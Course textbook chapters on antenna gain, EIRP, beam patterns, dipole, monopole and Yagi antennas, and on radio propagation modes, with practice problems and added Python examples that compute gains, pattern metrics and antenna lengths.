The length of an antenna is usually expressed in terms of the wavelength (λ) of the frequencies being transmitted. Low frequencies imply long wavelengths, hence low frequency antennas are very large (for example, the towers across the Severn River are used for the VLF Submarine Broadcast at 30 kHz and are hundreds of feet high). High frequencies imply short wavelengths, hence high frequency antennas are usually small (for example, the Dish Network transmission frequency from the satellite to your satellite dish is 12 GHz, and the antenna is approximately 1 cm long). Antennas are dual function, meaning that an antenna designed to transmit a certain frequency can also receive that frequency.

When selecting an appropriate antenna for a communication system, there are four key criteria that must be evaluated: antenna gain, antenna beam pattern/beamwidth, antenna bandwidth and physical size.

1. Gain – Antennas are not amplifiers, as you saw in Chapter 23, and the power out of the antenna is no more than the power in. However, because antennas focus power in certain directions, we say that an antenna can have a gain. Antenna gain determines how concentrated the transmitted power is in a particular direction (usually the direction of maximal radiation), or how well the antenna can receive signals from a particular direction. Higher gain means a stronger signal, making communication over longer distances possible. Conversely, we could communicate over the same distance with less transmit power. Note that some antennas use a parabolic dish to further increase antenna gain (such as the satellite dish for home satellite TV; the actual antenna is still 1 cm long, but the dish is much bigger). Isotropic antennas are theoretical antennas that have no directionality, and radiate their power equally in all directions.
Consider the figure below. On the left is an isotropic antenna, located at the center of the sphere. The power it transmits is spread equally in all directions, in a spherical shape. If it transmits 1 W, that 1 W will be spread over the surface of the sphere, so as you move farther from the antenna, the received power per unit area drops dramatically. On the right is a directional antenna. If this antenna also transmits 1 W, that power is spread over a much smaller surface area, as indicated, so that in the direction the antenna is pointing, the reduction in power is much less as you move farther from the antenna. The antenna gain is a measure of the power transmitted by a directional antenna in the direction it is pointing relative to that transmitted by an isotropic source. The mathematical definition of antenna gain is

$G = \frac{\text{Radiated power density at distance } x \text{ from directional antenna}}{\text{Radiated power density at distance } x \text{ from isotropic antenna}}$

If we convert this to decibels, because we are comparing relative to an isotropic antenna, it is common to use dBi instead of dB. To compute antenna gain in decibels, we have

$G_{dBi} = 10 \log_{10}(G)$ (dBi).

Similarly, to convert from dBi to a ratio we use

$G = 10^{G_{dBi}/10}$ (unitless).

Light can be used as an analogy to antenna gain. Imagine a single light bulb five feet from a wall. The light bulb sends light equally in all directions, similar to how an isotropic antenna sends radio waves equally in all directions. When we put the light bulb in a flashlight, the design of the flashlight focuses light in a single direction, and the portion of the wall still illuminated will consequently be brighter. This is similar to how a directional antenna focuses radio waves in a particular direction and is able to affect communications over longer distances (e.g., satellite communications). Antenna gain can be thought of as how much brighter the wall is with the flashlight versus how bright it was with only the light bulb.
A related characteristic of transmitting stations in a wireless communication system is the Effective Isotropic Radiated Power (EIRP), which is the product of the transmit power and the antenna gain:

$EIRP = P_t G_t$ (Watts)

Here, the subscript t indicates that this is transmitter power and transmit antenna gain. In decibels, .

EIRP is the amount of power that an isotropic antenna would have to transmit to achieve the same received power as a directional antenna at the same distance. To better explain this, let’s return briefly to our flashlight analogy. Let’s say I have 1 W being sent into my flashlight, which is five feet from the wall. The wall will then be a certain brightness. If we then remove the light bulb from the flashlight and stay five feet away, the wall will get dimmer, as we’ve previously discussed. EIRP is how much power I would now need to send into the light bulb, without the flashlight, in order to make the wall as bright as it was with the flashlight.

An antenna with directional gain has some advantages over an isotropic antenna. These include:
- Because energy is only sent in the desired direction, the possibility of interference with other transmitters at or near the same frequency is reduced.
- More focused power results in increased gain, which means that less power is required.
- Controlling the direction of the beam can help prevent eavesdropping, since you must be in the beam in order to receive the signal.
- A narrow beam can reduce the likelihood of detection in a covert setting, for the same reason as was just discussed.

However, directional antennas don’t work well in mobile situations (imagine keeping your cell phone pointed at a cell tower as you’re driving past it), and they can be physically large if the gain is big.

Practice Problem 24.1
A radio station has an EIRP of 25 kW and a transmit power of 1.73 kW. What is the gain of the antenna?
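An added example (not from the notes) of the gain and EIRP arithmetic of this section: gain as a ratio of power densities at the same distance, conversion between the unitless ratio and dBi, EIRP as P_t G_t, and the rearrangement Practice Problem 24.1 needs. Because 10 log10(P_t G_t) = 10 log10(P_t) + 10 log10(G_t), the dBW form is a plain sum; the spreading of an isotropic source over a sphere of radius d is written out here as an assumption to make the gain definition concrete.

```python
import math


def isotropic_power_density(pt_watts, d_m):
    """Power density (W/m^2) at distance d from an isotropic antenna radiating pt_watts:
    the whole power spread over a sphere of area 4*pi*d^2 (assumption used for illustration)."""
    return pt_watts / (4 * math.pi * d_m ** 2)


def gain_from_power_densities(pd_directional, pd_isotropic):
    """G = (power density from the directional antenna) / (power density from an isotropic
    antenna), both measured at the same distance and with the same transmit power."""
    return pd_directional / pd_isotropic


def gain_to_dbi(g):
    """G_dBi = 10 log10(G)."""
    return 10 * math.log10(g)


def dbi_to_gain(g_dbi):
    """G = 10^(G_dBi / 10), the unitless ratio."""
    return 10 ** (g_dbi / 10)


def eirp_watts(pt_watts, gt):
    """EIRP = Pt * Gt with Gt as a ratio; convert dBi first with dbi_to_gain()."""
    return pt_watts * gt


def gain_from_eirp(eirp_w, pt_watts):
    """Rearrangement used in Practice Problem 24.1: Gt = EIRP / Pt."""
    return eirp_w / pt_watts


def isotropic_power_for_same_coverage(pt_watts, gt_dbi):
    """EIRP read the other way round: the power an isotropic antenna (the bare light bulb)
    would need to match Pt fed into an antenna of gt_dbi in its pointing direction."""
    return eirp_watts(pt_watts, dbi_to_gain(gt_dbi))


def eirp_dbw(pt_watts, gt_dbi):
    """EIRP in dBW: 10 log10(Pt) + G_dBi, since the log turns the product into a sum."""
    return 10 * math.log10(pt_watts) + gt_dbi


if __name__ == "__main__":
    # Practice Problem 24.1 numbers: EIRP 25 kW from 1.73 kW of transmit power.
    g = gain_from_eirp(25e3, 1.73e3)
    print(f"gain ratio {g:.2f} = {gain_to_dbi(g):.2f} dBi")
    # Constructed check of the definition: a directional antenna whose density at 100 m is
    # 12.5 times that of an isotropic radiator fed with the same 1 W has G = 12.5.
    pd_iso = isotropic_power_density(1.0, 100.0)
    print("gain from densities:", gain_from_power_densities(12.5 * pd_iso, pd_iso))
```

The two conversions are the ones to keep straight: a gain only multiplies a power once it is a ratio, and it only adds to a power once both are in decibels.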
2. Beam Pattern/Beamwidth – Beam pattern is a diagram that shows specifically what direction(s) the antenna favors. You can think of a radiation pattern being created by having an antenna radiate a constant power (say 1 W, although any power will do), and then, with a power meter, walking in a complete circle 1 km (or any other constant distance) from the antenna and recording the power received at each point along the circle. The result will look something like the following figure.

An example radiation pattern is shown in this figure in red. In this pattern, relative bearings are shown with 0° being the direction the antenna is pointing. In this figure, each circle represents a change in received power of 3 dB, and the maximum power is along the 0° bearing. There are six lobes of transmitted power showing. The mainlobe is oriented towards 0°, the direction the antenna is pointing. There are four sidelobes, oriented towards ±60° and ±120°, and a backlobe, oriented towards 180° (directly away from where the antenna is pointing). In many cases, the mainlobe’s maximum value will be defined as 0 dB, and the power levels at all other points on the pattern are the number of dB less than the max; this is a measure of power relative to the max power. This form of a radiation pattern is only one of many that could be used; sometimes the rings are not in dB, sometimes they represent power density (W/m²), or power (dBW or dBm), etc. But the general features of the beam pattern will be similar. In actuality, antennas radiate in 3 dimensions, but the radiation patterns we will focus on are 2-dimensional, like the one shown above.

From the radiation pattern, a few new terms that describe the properties of the antenna come about. The sidelobe level (SLL) is a measure of the strength of the sidelobes compared to the mainlobe in decibels. The sidelobe level is measured from the peak of the main lobe to the peak of the largest sidelobe.
Mathematically,

$SLL_{dB} = G_{mainlobe}(dB) - G_{sidelobe}(dB)$.

For the antenna with the radiation pattern on the previous page, the largest sidelobes are at ±60°, so $SLL_{dB} = 0\ \text{dB} - (-16\ \text{dB}) = 16\ \text{dB}$.

Similarly, the front-to-back ratio (FBR) is a measure of the strength of the mainlobe relative to the strength of the backlobe in decibels. Mathematically,

$FBR_{dB} = G_{mainlobe}(dB) - G_{backlobe}(dB)$.

For the antenna with the radiation pattern on the previous page, the backlobe is at –17 dB, so the front-to-back ratio is $FBR_{dB} = 0\ \text{dB} - (-17\ \text{dB}) = 17\ \text{dB}$.

Finally, note that the radiation pattern has some bearings that are not a part of any lobe, for example ±35°. These are called nulls of the pattern, and at these bearings no power is transmitted from this antenna (or perhaps a minuscule amount), nor can this antenna receive signals from these bearings.

3. Beamwidth – Beamwidth is based on the relative bearings where transmitted (or received) power is reduced by a factor of ½ (or -3 dB, since $10 \log_{10}(\tfrac{1}{2}) = -3$) from the direction of max power. We call these points on the diagram the -3 dB (or half-power) points. The beamwidth is the angle that subtends these points. The following figure shows the beamwidth computation for the above beam pattern; the beamwidth is 20°. A narrow beamwidth (small angle) means the antenna is very directional.

4. Bandwidth – Bandwidth determines the range of frequencies that the antenna is best suited for. Broadband signals (that is, signals with a very wide bandwidth) transmit more data at a faster data rate, but broadband antennas are harder to design/build. An antenna is normally designed for a certain transmit frequency, but can be used successfully for a range of frequencies around that.

5. Physical Size – Physically larger antennas have a higher gain and narrower beamwidth, but are much harder to conceal. Also, the system using the antenna may introduce its own constraints (e.g., no one wants to mount a 6 meter dish on the roof of their car).
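Here is an added example (not from the notes) that encodes a constructed two-dimensional pattern matching the figures the text quotes (mainlobe at 0°, sidelobes at ±60° at -16 dB and ±120°, backlobe at 180° at -17 dB, half-power points at ±10°), then reads the sidelobe level, front-to-back ratio and beamwidth off it exactly as defined above, and answers the kind of bearing questions Practice Problem 24.2 asks. The parabolic-in-dB lobe shapes, the 5° sampling and the -40 dB null floor are my assumptions, not a measured pattern.

```python
FLOOR_DB = -40.0   # constructed level standing in for the pattern's nulls
STEP_DEG = 5       # angular sampling of the constructed pattern

# Constructed lobes: (centre bearing, peak level in dB relative to the mainlobe max,
# half-width at which the lobe is 3 dB down). Chosen to give SLL 16 dB, FBR 17 dB, beamwidth 20 deg.
LOBES = [(0, 0.0, 10), (60, -16.0, 8), (-60, -16.0, 8),
         (120, -22.0, 8), (-120, -22.0, 8), (180, -17.0, 8)]


def angle_diff(a, b):
    """Smallest signed difference between two bearings, in degrees (wraps at +/-180)."""
    return (a - b + 180) % 360 - 180


def lobe_level(bearing, centre, peak_db, half_width):
    """Parabolic-in-dB lobe: exactly 3 dB below its peak at +/- half_width from the centre."""
    return peak_db - 3.0 * (angle_diff(bearing, centre) / half_width) ** 2


def make_pattern():
    """Return {bearing: dB relative to the mainlobe max} for bearings -180..175 in 5 deg steps."""
    pattern = {}
    for b in range(-180, 180, STEP_DEG):
        level = max(lobe_level(b, *lobe) for lobe in LOBES)
        pattern[b] = max(level, FLOOR_DB)
    return pattern


def _wrap(bearing):
    return ((bearing + 180) % 360) - 180


def find_lobes(pattern):
    """Local maxima of the circular pattern as (bearing, dB), ignoring the null floor."""
    bearings = sorted(pattern)
    n = len(bearings)
    lobes = []
    for i, b in enumerate(bearings):
        lvl = pattern[b]
        if lvl > FLOOR_DB and lvl > pattern[bearings[(i - 1) % n]] and lvl > pattern[bearings[(i + 1) % n]]:
            lobes.append((b, lvl))
    return lobes


def classify_lobes(pattern):
    """Split the lobes into the mainlobe, the backlobe (opposite the mainlobe) and the sidelobes."""
    lobes = find_lobes(pattern)
    main = max(lobes, key=lambda l: l[1])
    others = [l for l in lobes if l != main]
    back = min(others, key=lambda l: abs(angle_diff(l[0], main[0] + 180)))
    sides = [l for l in others if l != back]
    return main, back, sides


def sidelobe_level_db(pattern):
    """SLL = G_mainlobe(dB) - G_sidelobe(dB), measured against the largest sidelobe."""
    main, _, sides = classify_lobes(pattern)
    return main[1] - max(s[1] for s in sides)


def front_to_back_db(pattern):
    """FBR = G_mainlobe(dB) - G_backlobe(dB)."""
    main, back, _ = classify_lobes(pattern)
    return main[1] - back[1]


def beamwidth_deg(pattern):
    """Angle between the two -3 dB (half-power) points either side of the mainlobe peak."""
    main, _, _ = classify_lobes(pattern)
    target = main[1] - 3.0
    edges = []
    for direction in (+1, -1):
        prev_lvl = main[1]
        for k in range(1, 360 // STEP_DEG):
            lvl = pattern[_wrap(main[0] + direction * k * STEP_DEG)]
            if lvl < target:
                # interpolate between the last sample at or above -3 dB and the first below it
                frac = (prev_lvl - target) / (prev_lvl - lvl)
                edges.append((k - 1) * STEP_DEG + frac * STEP_DEG)
                break
            prev_lvl = lvl
    return sum(edges)


def relative_level_db(pattern, bearing):
    """Pattern level (dB below the mainlobe max) at the sample nearest the given bearing."""
    return pattern[_wrap(round(bearing / STEP_DEG) * STEP_DEG)]


def in_null(pattern, bearing):
    """True when a station on this bearing sits in a null: it can neither interfere nor eavesdrop."""
    return relative_level_db(pattern, bearing) <= FLOOR_DB


if __name__ == "__main__":
    p = make_pattern()
    print("SLL", sidelobe_level_db(p), "dB; FBR", front_to_back_db(p), "dB; beamwidth", beamwidth_deg(p), "deg")
    for bearing in (90, 240):
        print(bearing, "deg:", "null" if in_null(p, bearing) else f"{relative_level_db(p, bearing)} dB")
```

The same functions work on any sampled pattern, for instance one read off a manufacturer's plot, as long as it is stored as bearing-to-dB pairs; a station at a bearing where relative_level_db() is well below the mainlobe receives that many dB less than one in the beam, which is the basis for the eavesdropping and interference questions.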
Antennas radiate most effectively when their length is directly related to the wavelength of the transmitted signal. Most antennas have a length that is some fraction of a wavelength. One-half and one-quarter wavelengths are most common.

Practice Problem 24.2
Consider the antenna with this radiation pattern:
1. What is the beamwidth of this directional antenna?
2. What is the sidelobe level?
3. What is the front-to-back ratio?
4. Will a station transmitting at bearing 90° interfere with me? Will I interfere with it?
5. Will a station at bearing 240° be able to eavesdrop on my communications?
6. Suppose the receiver I am communicating with (at 0°) requires that the signal received be at least 1 pW. Will I have to transmit more power or less power using this antenna than if I were using an isotropic antenna? Why?

II. Dipole Antenna

One of the most widely used antenna types is the half-wave dipole. A dipole antenna is two pieces of wire, rod, or tubing that are one-quarter wavelength long at the operating frequency, connected to a voltage source (these are the poles). The antenna is formed by placing these poles at a 90° angle from the transmission lines that are carrying the signal to be transmitted. This is depicted in the figure below. The most efficient radiation of EM waves comes when the total length of the antenna is λ/2, which is why the antenna is called the half-wave (λ/2) dipole antenna.

The radiation pattern for a horizontally oriented dipole antenna is shown below (on the left). The dipole is the heavy black line segment. The scale is not in dB, but this is the general shape. It is bidirectional, in that there is a backlobe that is as large as the mainlobe, both emanating perpendicular to the orientation of the dipole. If the dipole is oriented vertically, the radiation pattern is omnidirectional, as shown on the right. The 3-dimensional radiation patterns for the horizontally and vertically mounted dipole are shown on the next figure.
Note that the 2-dimensional patterns above are cutaways of the 3-dimensional patterns.

Major Parameters for the Dipole Antenna:
1. Beam Pattern/Beamwidth – A dipole mounted vertically has the 2-dimensional beam pattern in the azimuth plane shown in the figure on the previous page, and a -3 dB beamwidth of 78°. The vertically mounted antenna has an omnidirectional pattern in the azimuth (energy is spread equally in all directions).
2. Gain – A dipole has a gain of G = 1.64, or G_dBi = 2.15 dBi.
3. Bandwidth – A dipole typically has a bandwidth that is ~25% of the center frequency of transmission.
4. Physical Size – A dipole has a physical size equal to λ/2, where λ is the wavelength of transmission.

Practice Problem 24.3
A transmitter feeds a half-wave dipole antenna with 100 watts of power. Calculate the Effective Isotropic Radiated Power (EIRP).

Practice Problem 24.4
How long would a dipole antenna be for AM 1100?

III. Monopole Antenna

The quarter-wave (λ/4) monopole antenna, also called a Marconi antenna, is widely used. Its characteristics are similar to those of a vertically mounted dipole antenna, except that the monopole is connected to a ground plane (such as the earth), and uses it as a type of electrical “mirror” to reflect transmitted or received energy upwards to contribute to the upper part of the radiation pattern. Effectively, the ground plane acts as the “missing” half of a dipole antenna. The 3-dimensional radiation pattern for the vertically mounted λ/4 monopole is shown in the following figure (on the left), and a slice of the pattern (2-dimensional pattern in the vertical direction) is shown on the right.

Major Parameters for the Monopole Antenna
1. Beam Pattern/Beamwidth – A monopole has an omnidirectional pattern in the azimuth (energy is spread equally in all directions), and a -3 dB beamwidth of 45° in the vertical plane.
2. Gain – A monopole has a gain of G = 1.45, or G_dBi = 1.6 dBi.
3. Bandwidth – A monopole typically has a bandwidth that is ~10% of the center frequency.
4. Physical Size – A monopole has a physical size equal to λ/4.

Practice Problem 24.5
The ballistic submarine, USS Alaska, has gone alert. They must stream a floating wire monopole antenna to get their alert signal. If the alert signal is transmitted at 30 kHz, how far should they stream their antenna? (Note: the antenna being streamed is a straight wire.)

IV. Yagi (Yagi-Uda) Antenna

The Yagi-Uda was developed in Japan in 1926 by Professor Hidetsugu Yagi and his student Shintaro Uda. Their basic concept and structure is still used across a wide variety of modern antenna designs, and the Yagi-Uda is still the “go-to” antenna for high gain at VHF and UHF frequencies. There was a time when every home in America was equipped with a Yagi antenna on its roof to allow reception of broadcast television.

A Yagi antenna is composed of a driven element (a dipole antenna) and multiple parasitic elements. A driven element is one that is connected electrically to the transmitter. Parasitic elements are not connected electrically, but are placed in the vicinity of the driven element to either side. These parasitic elements (known as reflectors and directors) will resonate with the electric field produced by the dipole. Reflectors are longer than the dipole antenna, are all placed on one side of the dipole, and reflect the transmitted EM waves back towards the dipole antenna. Directors are shorter in length than the dipole, and “direct” EM waves from the dipole and reflectors to form the mainlobe. Judicious spacing of the parasitic elements will allow us to produce constructive interference and “push” energy in the forward direction, giving the Yagi-Uda good gain.

The effect of directors and reflectors is:
- More parasitic elements means higher gain and narrower beamwidth.
- Adding more directors is more effective than adding more reflectors.
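An added example, not from the notes, that computes wavelength from frequency and the resulting sizes of the half-wave dipole, the quarter-wave monopole and the Yagi's driven element (itself a half-wave dipole), plus the usable band implied by the bandwidth percentages the notes give for each antenna (the 5% figure for the Yagi is quoted from the Yagi parameters later in this section). It assumes the AM broadcast dial reads in kHz (so AM 1100 is 1100 kHz), uses c = 3.0 × 10^8 m/s as the chapter does, and adds a metres-to-feet conversion for the tower-height comparison in the introduction.

```python
C = 3.0e8          # speed of light in m/s, the value the chapter uses
FT_PER_M = 3.28084  # assumption: conversion used only to report long VLF antennas in feet

# Bandwidth as a fraction of the centre frequency, as quoted in the notes for each antenna type
BANDWIDTH_FRACTION = {"dipole": 0.25, "monopole": 0.10, "yagi": 0.05}


def wavelength_m(freq_hz):
    """lambda = c / f."""
    return C / freq_hz


def frequency_hz(lam_m):
    """f = c / lambda, the inverse, for problems that give a length."""
    return C / lam_m


def dipole_length_m(freq_hz):
    """Half-wave dipole: total length lambda/2 (two lambda/4 poles). Also the Yagi's driven element."""
    return wavelength_m(freq_hz) / 2


def monopole_length_m(freq_hz):
    """Quarter-wave (Marconi) monopole over a ground plane: lambda/4."""
    return wavelength_m(freq_hz) / 4


def frequency_from_driven_element_hz(length_m):
    """A Yagi's driven element is a half-wave dipole, so lambda = 2L and f = c / (2L)."""
    return frequency_hz(2 * length_m)


def usable_band_hz(center_hz, antenna):
    """(low, high) edges of the band the antenna is suited for, centred on its design frequency."""
    half = BANDWIDTH_FRACTION[antenna] * center_hz / 2
    return center_hz - half, center_hz + half


def size_report(freq_hz):
    """Wavelength and the two common antenna sizes for one design frequency."""
    lam = wavelength_m(freq_hz)
    return {"wavelength_m": lam, "dipole_m": lam / 2, "monopole_m": lam / 4,
            "monopole_ft": lam / 4 * FT_PER_M}


if __name__ == "__main__":
    # Design frequencies taken from the practice problems; AM 1100 read as 1100 kHz (assumption).
    for label, f in [("AM 1100", 1.1e6), ("FM 107.1 MHz", 107.1e6),
                     ("VLF 30 kHz", 30e3), ("Yagi at 290 MHz", 290e6)]:
        print(f"{label:16s}", {k: round(v, 3) for k, v in size_report(f).items()})
    print("900 mm driven element operates at", frequency_from_driven_element_hz(0.9) / 1e6, "MHz")
    print("dipole cut for 100 MHz is usable from", usable_band_hz(100e6, "dipole"))
```

The frequency-to-size relationship is the whole physical-size criterion in one function: the same λ/4 rule that gives a pocket-sized UHF whip gives a kilometres-long VLF wire, which is why a submarine has to stream its 30 kHz antenna rather than mount it.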
The greater the number of directors, the higher the gain and the narrower the beamwidth. However, we get diminishing returns as more elements are added. Most Yagi antennas have 1 reflector and 1-20 directors.

Here is a Yagi-Uda with one director and one reflector. This is a three-element Yagi. The simplest Yagi, consisting of a driven element and one reflector, shown on the bottom of the prior page, has a gain of about 5 dBi.

Practice Problem 24.6
What is the length of the driven element in a Yagi at 290 MHz?

A manufacturer of Yagi antennas is the L-Com Global Connectivity corporation (www.l-com.com). Here’s an example pattern of one of their 900 MHz Yagi antennas (model HG906YE-RSP). The driven element (dipole) has a cable connected to it. This Yagi has 1 reflector and 2 directors, and a gain of 6 dBi. The horizontal beamwidth is 100°, vertical beamwidth 60°. Compare that to their model HG914YE-RSP antenna, which has 1 reflector, 11 directors, and 14 dBi of gain. The horizontal beamwidth is 31°, vertical beamwidth 28°. All else being equal, is the antenna with the higher gain a “better” antenna? Well, unfortunately, all else is not equal. The 6 dBi Yagi is only 14.2 inches long, while the 14 dBi Yagi is a whopping 60 inches (that’s 5 full feet) long, almost six times the length of the 6 dBi antenna. If constrained by size, the 6 dBi antenna may be the better choice. Although the Yagi antenna does a good job at directing (and receiving) energy from the forward direction (in the main lobe), its sidelobes are fairly large in comparison.

Major Parameters for the Yagi Antenna
1. Beam Pattern/Beamwidth – A Yagi is a directional antenna that transmits energy in a main lobe, but with fairly high side lobe levels. The beamwidth is dependent on the number of parasitic elements, with more elements resulting in a narrower beamwidth.
2. Gain – A Yagi’s gain is directly proportional to the number of parasitic elements, with typical gains in the range of 5-20 dBi. (You will never be asked to calculate the gain of a Yagi antenna based on its dimensions.)
3. Bandwidth – A Yagi is typically very narrowband, with a bandwidth ~5% of the center frequency.
4. Physical Size – A Yagi’s dipole radiator has a physical size equal to λ/2, but the overall length is determined by the number of directors. Directors are typically spaced in half-wavelength increments.

You should be familiar with the four major parameters for the following three antennas:
- Dipole
- Monopole
- Yagi-Uda

Problems

1. What are the 4 engineering factors associated with the design of antennas?
2. a) Calculate the length, in meters, of a dipole antenna that is designed to receive a station at AM 800 on the dial of an AM radio.
   b) Calculate the length, in meters, of a monopole antenna that is designed to receive the FM station at 107.1 MHz.
3. Given the following radiation pattern, where each ring represents a 1 dB change in power, what is the beamwidth? The sidelobe level? The front-to-back ratio?
4. Given the following radiation pattern, where each ring represents a 2 dB change in power, what is the beamwidth? The sidelobe level? The front-to-back ratio?
5. The power applied to an antenna with a gain of 4 dB is 13 W. What is the EIRP?
6. What does it mean for an antenna to have directivity, and what are the advantages and disadvantages of a directional antenna?
7. Name and describe the three basic elements in a Yagi antenna.
8. The length of the driven element in a Yagi antenna is 900 mm; what is its operating frequency?
9. The mainlobe of an antenna has a maximum gain value of +18 dB at its peak point of forward direction. The same antenna has a gain of −5 dB at the peak point of its rear lobe. Determine the front-to-back ratio of the antenna.
10. Yagi antennas A and B both have a driven element designed to transmit/receive 100 MHz.
Yagi antenna A has 1 director and 3 reflectors, while Yagi antenna B has 1 director and 7 reflectors. Describe the differences you would expect to see in their radiation patterns.

Security Exercise 24
Reserved.

Chapter 25: Propagation

Objectives:
(a) Define reflection, refraction, diffraction and scattering.
(b) Describe the characteristics of ground waves, sky waves, and space waves.
(c) Calculate the radio horizon distance for space waves based on antenna height.
(d) Compute the received power level for a communication system using the Friis Free Space equation.
(e) Using the log-normal propagation model, compute received power, path loss or transmission distance.

Connection to Cyber Security

In a wireless communication system, the transmitter transmits a modulated signal into free space using an antenna. The signal then propagates through free space until it reaches the receive antenna. Along the way, the transmitted signal loses power, so that by the time it gets to the receiver, the received power can be extremely low. If the received power is too low, the receiver will not be able to recover the information. In this chapter, you’ll be introduced to the various ways that signals can propagate through free space, and also how to compute the received power. Cyber attacks against wireless communication systems can take advantage of a low received signal power to jam the transmission, or to take control of the communication link.

I. Wireless Propagation

Propagation is the means by which a signal moves from Point A to Point B. It sounds simple, but it is the most fundamental and challenging aspect of wireless communications. In a wired system (such as an Ethernet network), propagation is not really a concern per se. However, wireless transmission requires a fundamental understanding of how electromagnetic waves move through the atmosphere.
The challenges of propagation in free space include the fact that the transmitter and/or receiver may be moving, obstacles in the path of propagation, a path that is not necessarily a straight line, and a signal that takes various paths to get to the receiver. In general, we can think about radio frequency propagation in two broad categories: large scale and small scale. Our emphasis in EC310 is on understanding large scale propagation (longer distance), although many engineers have devoted their entire careers to understanding and modeling small scale propagation. In fact, you’ve likely experienced a small scale propagation issue numerous times without ever realizing it. The classic example would be driving down the highway while talking on your cell phone and experiencing a dropped call.

Large Scale Propagation – The behavior of the radio channel over large distances (100s or 1000s of wavelengths of distance). Received power is directly related to the distance between Tx and Rx, and is stationary with respect to time.

Small Scale Propagation – The behavior of the radio channel over a small local area (1-10 wavelengths of distance) and/or over small time durations. Received power fluctuates rapidly based on position, speed, direction of travel, etc. of the mobile.

II. Large Scale Propagation

A. Physical Phenomena

Large scale propagation is affected by four physical phenomena:
- Reflection – the bouncing of EM waves off of surrounding objects, such as vehicles, buildings, etc.
- Refraction – the bending of EM waves as they travel through mediums of different material
- Diffraction – the bending of EM waves around objects
- Scattering – diffuse re-radiation of EM waves off rough (smaller than the signal’s λ) objects

Let’s look at these briefly, one at a time.

1. Reflection
Reflection occurs when a transmitted EM wave strikes a conductive object (such as a metallic object) on its path to the receiver.
As you recall from physics, in reflection, if the object is flat, the angle of reflection is equal to the angle of incidence.

2. Refraction
When an EM wave passes from one medium to another, the EM wave’s path can change direction (bend). In wireless communications, we see this when EM waves directed towards the sky go up into the ionosphere, and eventually bend back down to earth as depicted in the figure below.

3. Diffraction
Diffraction is the bending of EM waves around objects in their path, even behind them to some extent. Consider a transmitter and receiver where an object is blocking the direct line-of-sight path between them. The signal can diffract around the object such that the signal can get to the receiver even though it is shadowed. Note that the more deeply the receiver is shadowed, the lower the received power, and in some cases the receiver may not be able to receive any signal. The concept of diffraction is illustrated below.

4. Rough Surface Scattering
Sometimes called diffuse scattering or diffuse reflection, scattering happens when an EM wave impacts a rough surface and is re-radiated in many directions at much reduced power levels.

So those are the basic physical phenomena of propagation. What happens when we add in a real earth and a real atmosphere? The earth and the earth’s atmosphere have the greatest impact on signals in the VLF – HF range (3 kHz – 30 MHz). It’s not that the earth and atmosphere don’t affect signals at higher frequencies; it’s just that at those higher frequencies other factors come into play and dominate the effects of the earth/atmosphere. Let’s look at what happens to these lower frequencies first before moving on to the higher frequencies.
Band                            Frequency Range       Propagation Mode
VLF (Very Low Frequency)        3 kHz – 30 kHz        Ground waves
LF (Low Frequency)              30 kHz – 300 kHz      Ground waves
MF (Medium Frequency)           300 kHz – 3 MHz       Ground waves, sky waves at night
HF (High Frequency)             3 MHz – 30 MHz        Sky waves
VHF (Very High Frequency)       30 MHz – 300 MHz      Space waves
UHF (Ultra High Frequency)      300 MHz – 3 GHz       Space waves
SHF (Super High Frequency)      3 GHz – 30 GHz        Space waves
EHF (Extremely High Frequency)  30 GHz – 300 GHz      Space waves

B. Modes of Propagation

For VLF-HF communications, there are three basic modes by which a radio wave can travel from the transmitter to a receiving antenna:
- Ground wave – EM waves that travel close to the surface of the earth
- Sky wave – EM waves that travel up into the atmosphere and then bend back to earth
- Space wave – EM waves that travel in a straight line (direct line-of-sight or LOS)

The frequency of the radio wave is the most important factor in determining the mode and performance of each mode of propagation.

1. Ground Wave Propagation
A ground wave is a radio wave that travels along the earth’s surface (also referred to as a surface wave). A ground wave must be vertically polarized; that is, the antenna must be oriented vertically. Lower frequencies travel efficiently as ground waves because they are diffracted by the surface of the earth. Ground waves thus follow the curvature of the earth and can travel beyond the horizon, for hundreds of miles. Ground wave propagation is strongest in the LF and MF frequency ranges. Ground wave propagation constitutes the main signal path for signals in the frequency range from 30 kHz – 3 MHz.

2. Sky Wave Propagation
Sky waves are radiated by an antenna into the upper atmosphere, where they are reflected or refracted back to earth. The air molecules of the ionosphere are subject to severe radiation from the sun. Ultraviolet radiation causes the molecules to ionize, or separate into charged particles, positive and negative ions.
This separates the upper atmosphere into different layers (or mediums) that promote reflection or refraction. The direction of reflection depends on the angle at which the radio wave enters the atmosphere and the different degrees of ionization of the layers, as well as the frequency of the transmission.

3. Space Wave Propagation
A space wave refers to the radio wave that travels directly in a straight line from the transmitting antenna (LOS). These waves are not refracted, and do not follow the curvature of the earth. The chief limitation of a space wave is that it is limited to line-of-sight distances. The range of space wave propagation is limited by the curvature of the earth and the height of the antennas above the earth’s surface. If an antenna has a height h above the surface of the earth, the distance, d, to the radio horizon (which is the maximum range for space wave communications from that antenna) is given by the formula

$d = \sqrt{2h}$.

Important: In this formula, the height of the antenna is in feet, and the distance to the horizon is in miles. That is, if you plug in the antenna height in feet, the resulting distance value will be in miles.

The next figure demonstrates the maximum distance that two stations can be apart and still conduct line-of-sight communication. This figure shows one antenna of height h1 and a second antenna of height h2. The maximum separation at which they can still communicate by line-of-sight is given by:

$d_{total} = \sqrt{2h_1} + \sqrt{2h_2}$.

Practice Problem 25.1
What is the longest line-of-sight communication range between a transmitter whose transmitting antenna is 350 feet high and a receiver whose receiving antenna is 25 feet high?

Now that we’ve covered all the glories of Large Scale Propagation in real-world environments, it behooves us to look at the most basic way we can transmit energy from Point A to Point B in an environment devoid of terrain, mountains, buildings, ground, or atmosphere.
Such an environment is known as Free Space, and conveniently, wireless propagation in such an environment is known as Free Space Propagation.

III. Free Space Propagation

Let’s consider the following scenario. You have a brand-new iPhone (or Samsung phone as the case may be), have just signed up for a super-fast LTE plan, and would like to upload a photo, surf the web, browse Facebook, or just plain make a phone call. To make that happen, your phone has to transmit that information over the air to the nearest LTE cell tower (cost: $5 Million, that’s why your phone bill is $100/month), which happens to be 5 miles away.

Question: Will your signal make it to the tower and will it have sufficient power to “close the link” and allow you to communicate? Or will you suffer the fate of a cellular “dead zone”? That depends on the amount of signal power that is received.

Recall from Chapter 24 the discussion of antenna gain. An antenna has gain if it can focus its transmitted power (or can receive power) in a certain direction, as opposed to an isotropic antenna that radiates (or receives) power equally in all directions (in a spherical shape). This led to the term effective isotropic radiated power (EIRP), which is the amount of power an isotropic antenna would have to radiate in order to match the power that a directional antenna radiates in the direction it is pointing.

